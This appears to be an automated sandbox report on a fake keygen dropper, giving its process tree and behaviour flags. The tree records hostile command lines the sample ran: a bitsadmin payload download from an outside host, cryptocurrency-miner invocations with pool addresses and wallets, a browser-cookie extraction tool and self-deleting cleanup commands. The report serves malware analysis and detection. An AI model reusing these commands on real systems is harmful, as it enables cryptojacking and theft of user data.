dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	filee.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
4492	PING.EXE
3964	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2664	rundll32.exe
2664	rundll32.exe
3216	svchost.exe
3216	svchost.exe
4148	ultramediaburner.tmp
4148	ultramediaburner.tmp
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeTcbPrivilege	3216	svchost.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2684	JoSetp.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	3776	Ultra.exe
Token: SeAuditPrivilege	2472	svchost.exe
Token: SeDebugPrivilege	4260	Bahykaejewi.exe
Token: SeDebugPrivilege	4320	Daezholypuda.exe
Token: SeAssignPrimaryTokenPrivilege	2616	svchost.exe
Token: SeIncreaseQuotaPrivilege	2616	svchost.exe
Token: SeSecurityPrivilege	2616	svchost.exe
Token: SeTakeOwnershipPrivilege	2616	svchost.exe
Token: SeLoadDriverPrivilege	2616	svchost.exe
Token: SeSystemtimePrivilege	2616	svchost.exe
Token: SeBackupPrivilege	2616	svchost.exe
Token: SeRestorePrivilege	2616	svchost.exe
Token: SeShutdownPrivilege	2616	svchost.exe
Token: SeSystemEnvironmentPrivilege	2616	svchost.exe
Token: SeUndockPrivilege	2616	svchost.exe
Token: SeManageVolumePrivilege	2616	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2616	svchost.exe
Token: SeIncreaseQuotaPrivilege	2616	svchost.exe
Token: SeSecurityPrivilege	2616	svchost.exe
Token: SeTakeOwnershipPrivilege	2616	svchost.exe
Token: SeLoadDriverPrivilege	2616	svchost.exe
Token: SeSystemtimePrivilege	2616	svchost.exe
Token: SeBackupPrivilege	2616	svchost.exe
Token: SeRestorePrivilege	2616	svchost.exe
Token: SeShutdownPrivilege	2616	svchost.exe
Token: SeSystemEnvironmentPrivilege	2616	svchost.exe
Token: SeUndockPrivilege	2616	svchost.exe
Token: SeManageVolumePrivilege	2616	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2616	svchost.exe
Token: SeIncreaseQuotaPrivilege	2616	svchost.exe
Token: SeSecurityPrivilege	2616	svchost.exe
Token: SeTakeOwnershipPrivilege	2616	svchost.exe
Token: SeLoadDriverPrivilege	2616	svchost.exe
Token: SeSystemtimePrivilege	2616	svchost.exe
Token: SeBackupPrivilege	2616	svchost.exe
Token: SeRestorePrivilege	2616	svchost.exe
Token: SeShutdownPrivilege	2616	svchost.exe
Token: SeSystemEnvironmentPrivilege	2616	svchost.exe
Token: SeUndockPrivilege	2616	svchost.exe
Token: SeManageVolumePrivilege	2616	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2616	svchost.exe
Token: SeIncreaseQuotaPrivilege	2616	svchost.exe
Token: SeSecurityPrivilege	2616	svchost.exe
Token: SeTakeOwnershipPrivilege	2616	svchost.exe
Token: SeLoadDriverPrivilege	2616	svchost.exe
Token: SeSystemtimePrivilege	2616	svchost.exe
Token: SeBackupPrivilege	2616	svchost.exe
Token: SeRestorePrivilege	2616	svchost.exe
Token: SeShutdownPrivilege	2616	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4148	ultramediaburner.tmp

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1460	xiuhuali.exe
1460	xiuhuali.exe
4776	MicrosoftEdge.exe
4980	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 57 IoCs

description	pid	Process	procid_target
PID 4048 wrote to memory of 1460	4048	keygen-step-4 — копия.exe	73
PID 4048 wrote to memory of 1460	4048	keygen-step-4 — копия.exe	73
PID 4048 wrote to memory of 1460	4048	keygen-step-4 — копия.exe	73
PID 1460 wrote to memory of 2664	1460	xiuhuali.exe	76
PID 1460 wrote to memory of 2664	1460	xiuhuali.exe	76
PID 1460 wrote to memory of 2664	1460	xiuhuali.exe	76
PID 4048 wrote to memory of 2684	4048	keygen-step-4 — копия.exe	77
PID 4048 wrote to memory of 2684	4048	keygen-step-4 — копия.exe	77
PID 2664 wrote to memory of 3216	2664	rundll32.exe	70
PID 2664 wrote to memory of 2864	2664	rundll32.exe	11
PID 3216 wrote to memory of 196	3216	svchost.exe	78
PID 3216 wrote to memory of 196	3216	svchost.exe	78
PID 3216 wrote to memory of 196	3216	svchost.exe	78
PID 2664 wrote to memory of 352	2664	rundll32.exe	52
PID 2664 wrote to memory of 2456	2664	rundll32.exe	20
PID 2664 wrote to memory of 2472	2664	rundll32.exe	18
PID 2664 wrote to memory of 1104	2664	rundll32.exe	47
PID 2664 wrote to memory of 928	2664	rundll32.exe	50
PID 2664 wrote to memory of 1352	2664	rundll32.exe	41
PID 2664 wrote to memory of 1852	2664	rundll32.exe	30
PID 2664 wrote to memory of 1228	2664	rundll32.exe	44
PID 2664 wrote to memory of 1276	2664	rundll32.exe	42
PID 2664 wrote to memory of 2616	2664	rundll32.exe	13
PID 2664 wrote to memory of 2644	2664	rundll32.exe	12
PID 4048 wrote to memory of 2632	4048	keygen-step-4 — копия.exe	82
PID 4048 wrote to memory of 2632	4048	keygen-step-4 — копия.exe	82
PID 4048 wrote to memory of 2632	4048	keygen-step-4 — копия.exe	82
PID 2632 wrote to memory of 3712	2632	Install.exe	83
PID 2632 wrote to memory of 3712	2632	Install.exe	83
PID 2632 wrote to memory of 3712	2632	Install.exe	83
PID 3712 wrote to memory of 3776	3712	Install.tmp	84
PID 3712 wrote to memory of 3776	3712	Install.tmp	84
PID 3776 wrote to memory of 2060	3776	Ultra.exe	86
PID 3776 wrote to memory of 2060	3776	Ultra.exe	86
PID 3776 wrote to memory of 2060	3776	Ultra.exe	86
PID 2060 wrote to memory of 4148	2060	ultramediaburner.exe	88
PID 2060 wrote to memory of 4148	2060	ultramediaburner.exe	88
PID 2060 wrote to memory of 4148	2060	ultramediaburner.exe	88
PID 4148 wrote to memory of 4224	4148	ultramediaburner.tmp	89
PID 4148 wrote to memory of 4224	4148	ultramediaburner.tmp	89
PID 3776 wrote to memory of 4260	3776	Ultra.exe	90
PID 3776 wrote to memory of 4260	3776	Ultra.exe	90
PID 3776 wrote to memory of 4320	3776	Ultra.exe	91
PID 3776 wrote to memory of 4320	3776	Ultra.exe	91
PID 4048 wrote to memory of 4440	4048	keygen-step-4 — копия.exe	92
PID 4048 wrote to memory of 4440	4048	keygen-step-4 — копия.exe	92
PID 4048 wrote to memory of 4440	4048	keygen-step-4 — копия.exe	92
PID 4320 wrote to memory of 4204	4320	Daezholypuda.exe	96
PID 4320 wrote to memory of 4204	4320	Daezholypuda.exe	96
PID 4204 wrote to memory of 4400	4204	cmd.exe	143
PID 4204 wrote to memory of 4400	4204	cmd.exe	143
PID 4204 wrote to memory of 4400	4204	cmd.exe	143
PID 4440 wrote to memory of 4304	4440	filee.exe	100
PID 4440 wrote to memory of 4304	4440	filee.exe	100
PID 4440 wrote to memory of 4304	4440	filee.exe	100
PID 4440 wrote to memory of 4920	4440	filee.exe	102
PID 4440 wrote to memory of 4920	4440	filee.exe	102

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2864

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2644

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2616

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2472

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2456

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1852

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1352

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1276

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1228

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1104

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:928

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:352

C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4048
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1460
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
    3⤵
    - Loads dropped DLL
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2664
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2684
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2632
- - C:\Users\Admin\AppData\Local\Temp\is-QU9HH.tmp\Install.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-QU9HH.tmp\Install.tmp" /SL5="$501E0,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3712
  - - C:\Users\Admin\AppData\Local\Temp\is-MRE0H.tmp\Ultra.exe
      "C:\Users\Admin\AppData\Local\Temp\is-MRE0H.tmp\Ultra.exe" /S /UID=burnerch1
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Program Files directory
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3776
    - - C:\Program Files\Common Files\KPJAZEFTIK\ultramediaburner.exe
        
        "C:\Program Files\Common Files\KPJAZEFTIK\ultramediaburner.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2060
      - C:\Users\Admin\AppData\Local\Temp\is-KGJ8S.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-KGJ8S.tmp\ultramediaburner.tmp" /SL5="$301F4,281924,62464,C:\Program Files\Common Files\KPJAZEFTIK\ultramediaburner.exe" /VERYSILENT
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:4148
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        7⤵
        Executes dropped EXE
        
        PID:4224
    - - C:\Users\Admin\AppData\Local\Temp\74-ce3fb-72b-9f3b1-b5dfbb0baa0b6\Bahykaejewi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\74-ce3fb-72b-9f3b1-b5dfbb0baa0b6\Bahykaejewi.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4260
    - - C:\Users\Admin\AppData\Local\Temp\9b-4c092-d28-1579a-56449aae63f1f\Daezholypuda.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9b-4c092-d28-1579a-56449aae63f1f\Daezholypuda.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4320
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3jyrjqo4.mc2\instEU.exe & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4204
        
        C:\Users\Admin\AppData\Local\Temp\3jyrjqo4.mc2\instEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\3jyrjqo4.mc2\instEU.exe
        7⤵
        
        PID:4400
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ldtf5e14.g1j\google-game.exe & exit
        6⤵
        
        PID:4772
        
        C:\Users\Admin\AppData\Local\Temp\ldtf5e14.g1j\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\ldtf5e14.g1j\google-game.exe
        7⤵
        
        PID:4116
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
        8⤵
        
        PID:4588
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g41gored.ikb\md1_1eaf.exe & exit
        6⤵
        
        PID:5324
        
        C:\Users\Admin\AppData\Local\Temp\g41gored.ikb\md1_1eaf.exe
        
        C:\Users\Admin\AppData\Local\Temp\g41gored.ikb\md1_1eaf.exe
        7⤵
        
        PID:5572
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nahpjdgh.g4e\y1.exe & exit
        6⤵
        
        PID:5900
        
        C:\Users\Admin\AppData\Local\Temp\nahpjdgh.g4e\y1.exe
        
        C:\Users\Admin\AppData\Local\Temp\nahpjdgh.g4e\y1.exe
        7⤵
        
        PID:6100
        
        C:\Users\Admin\AppData\Local\Temp\cYtXI8Dsuy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cYtXI8Dsuy.exe"
        8⤵
        
        PID:6012
        
        C:\Users\Admin\AppData\Roaming\1619344066289.exe
        
        "C:\Users\Admin\AppData\Roaming\1619344066289.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619344066289.txt"
        9⤵
        
        PID:4620
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\cYtXI8Dsuy.exe"
        9⤵
        
        PID:4444
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        10⤵
        Runs ping.exe
        
        PID:3964
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\nahpjdgh.g4e\y1.exe"
        8⤵
        
        PID:5472
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        9⤵
        Delays execution with timeout.exe
        
        PID:3200
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0ouutvwq.20q\askinstall39.exe & exit
        6⤵
        
        PID:4596
        
        C:\Users\Admin\AppData\Local\Temp\0ouutvwq.20q\askinstall39.exe
        
        C:\Users\Admin\AppData\Local\Temp\0ouutvwq.20q\askinstall39.exe
        7⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        8⤵
        
        PID:5520
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        9⤵
        Kills process with taskkill
        
        PID:2308
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y2mm44s3.qn3\inst.exe & exit
        6⤵
        
        PID:5252
        
        C:\Users\Admin\AppData\Local\Temp\y2mm44s3.qn3\inst.exe
        
        C:\Users\Admin\AppData\Local\Temp\y2mm44s3.qn3\inst.exe
        7⤵
        
        PID:5860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vyifdtw5.umb\SunLabsPlayer.exe /S & exit
        6⤵
        
        PID:6080
        
        C:\Users\Admin\AppData\Local\Temp\vyifdtw5.umb\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\vyifdtw5.umb\SunLabsPlayer.exe /S
        7⤵
        
        PID:4408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgAEC6.tmp\tempfile.ps1"
        8⤵
        
        PID:4128
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        Executes dropped EXE
        
        PID:4400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgAEC6.tmp\tempfile.ps1"
        8⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgAEC6.tmp\tempfile.ps1"
        8⤵
        
        PID:6072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgAEC6.tmp\tempfile.ps1"
        8⤵
        
        PID:3420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgAEC6.tmp\tempfile.ps1"
        8⤵
        
        PID:4840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgAEC6.tmp\tempfile.ps1"
        8⤵
        
        PID:5800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgAEC6.tmp\tempfile.ps1"
        8⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
        8⤵
        Download via BitsAdmin
        
        PID:2840
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\evdek54n.1rv\GcleanerWW.exe /mixone & exit
        6⤵
        
        PID:4444
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tzhewvwu.tqm\toolspab1.exe & exit
        6⤵
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\tzhewvwu.tqm\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\tzhewvwu.tqm\toolspab1.exe
        7⤵
        
        PID:5876
        
        C:\Users\Admin\AppData\Local\Temp\tzhewvwu.tqm\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\tzhewvwu.tqm\toolspab1.exe
        8⤵
        
        PID:5052
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ysu2ongp.x1j\c7ae36fa.exe & exit
        6⤵
        
        PID:6040
        
        C:\Users\Admin\AppData\Local\Temp\ysu2ongp.x1j\c7ae36fa.exe
        
        C:\Users\Admin\AppData\Local\Temp\ysu2ongp.x1j\c7ae36fa.exe
        7⤵
        
        PID:5476
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cmdiyand.ijl\app.exe /8-2222 & exit
        6⤵
        
        PID:4300
        
        C:\Users\Admin\AppData\Local\Temp\cmdiyand.ijl\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\cmdiyand.ijl\app.exe /8-2222
        7⤵
        
        PID:6132
        
        C:\Users\Admin\AppData\Local\Temp\cmdiyand.ijl\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cmdiyand.ijl\app.exe" /8-2222
        8⤵
        
        PID:2100
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:4440
- - C:\Users\Admin\AppData\Roaming\6DE2.tmp.exe
    "C:\Users\Admin\AppData\Roaming\6DE2.tmp.exe"
    3⤵
    - Executes dropped EXE
    PID:4304
  - - C:\Users\Admin\AppData\Roaming\6DE2.tmp.exe
      "C:\Users\Admin\AppData\Roaming\6DE2.tmp.exe"
      4⤵
      PID:4144
- - C:\Users\Admin\AppData\Roaming\7016.tmp.exe
    "C:\Users\Admin\AppData\Roaming\7016.tmp.exe"
    3⤵
    - Executes dropped EXE
    PID:4920
  - - C:\Windows\system32\msiexec.exe
      -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w29147@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
      4⤵
      PID:4988
  - - C:\Windows\system32\msiexec.exe
      -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w11353 --cpu-max-threads-hint 50 -r 9999
      4⤵
      PID:5152
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
    3⤵
    PID:4560
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:4492
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
  2⤵
  PID:5792
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
  2⤵
  PID:496
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    PID:5992
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    PID:5684

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3216
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  PID:196

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4776

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4824

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4980

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4564

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5128

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3048

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5712

